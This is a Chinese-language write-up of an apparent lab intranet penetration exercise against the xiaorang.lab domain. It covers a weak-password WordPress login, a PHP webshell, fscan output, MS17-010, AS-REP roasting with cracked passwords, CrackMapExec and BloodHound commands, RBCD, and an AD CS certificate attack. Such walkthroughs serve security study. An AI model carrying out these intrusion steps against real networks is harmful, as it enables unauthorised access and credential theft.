探测相关插件和Wordpress版本均未发现相关漏洞，尝试弱口令，以弱口令成功登入后台

写入Webshell

后台可以编辑PHP文件，改动为一句话木马即可

内网横向

信息搜集

Fscan扫描内网网段

172.22.15.24:139 open
172.22.15.18:139 open
172.22.15.35:139 open
172.22.15.13:139 open
172.22.15.18:135 open
172.22.15.35:135 open
172.22.15.24:135 open
172.22.15.13:135 open
172.22.15.18:445 open
172.22.15.35:445 open
172.22.15.13:445 open
172.22.15.24:445 open
172.22.15.13:88 open
172.22.15.18:80 open
172.22.15.26:80 open
172.22.15.26:22 open
172.22.15.24:80 open
172.22.15.24:3306 open
[*] NetInfo
[*]172.22.15.13
[->]XR-DC01
[->]172.22.15.13
[*] NetInfo
[*]172.22.15.18
[->]XR-CA
[->]172.22.15.18
[*] NetInfo
[*]172.22.15.24
[->]XR-WIN08
[->]172.22.15.24
[*] OsInfo 172.22.15.13 (Windows Server 2016 Standard 14393)
[+] MS17-010 172.22.15.24 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.15.35 XIAORANG\XR-0687
[*] NetInfo
[*]172.22.15.35
[->]XR-0687
[->]172.22.15.35
[*] NetBios 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.13 [+] DC:XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.15.26 code:200 len:39962 title:XIAORANG.LAB
[*] WebTitle http://172.22.15.18 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.15.24 code:302 len:0 title:None 跳转url: http://172.22.15.24/www
[+] PocScan http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
[*] WebTitle http://172.22.15.24/www/sys/index.php code:200 len:135 title:None

代理搭建

攻击域成员一(MS17-010)

访问存在Web服务的

发现是ZDOO，搜索相关漏洞后无果

弱口令登录

尝试弱口令登录，成功以admin/123456登入

但尝试相关漏洞后无果，怀疑是内网常见漏洞，尝试我们常见的永恒之蓝漏洞。

Ms17-010攻击

攻击域成员二(RBCD)

信息搜集

新建管理员用户

RDP登录后发现桌面存放有数据库服务

使用phpmyadmin进行数据库连接后将用户导出

AS—REP Roasting

使用GetNPUsers查找不需要Kerberos预身份验证的用户

hashcat爆破得到两组用户lixiuying:winniethepooh
huachunmei:1qaz2wsx

使用cme尝试可RDP登录的主机proxychains ./cme rdp 172.22.15.9/24 -u lixiuying -p winniethepooh -d xiaorang.lab

Bloodhound分析

proxychains bloodhound–python –u lixiuying –p winniethepooh –d xiaorang.lab –c all –ns

发现此用户对XR-0687主机有GenericWrite权限，可尝试RBCD获取管理员权限

RBCD攻击

做完想来应该是没有在etc/hosts中添加XR-CA.xiaorang.lab的对应IP地址，导致无法找到它这个主机。

当时在这里卡住了，参考https://fushuling.com/index.php/2023/09/17/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7%e7%bd%91%e9%bc%8e%e6%9d%af%e5%8d%8a%e5%86%b3%e8%b5%9b%e6%b2%a1%e6%89%93%e5%ae%8c/

漏洞探测

首先添加用户，如果能够添加成功就说明漏洞存在，使用工具链接https://github.com/ly4k/Certipy

成功添加，说明漏洞存在。

申请证书模板

要尝试两次才能成功

版权声明 1 本网站名称：山海云端-专注于PHP与网络安全
2 本站永久网址：www.shserve.cn
3 本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长 QQ1790643379进行删除处理。
4 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5 本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6 本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END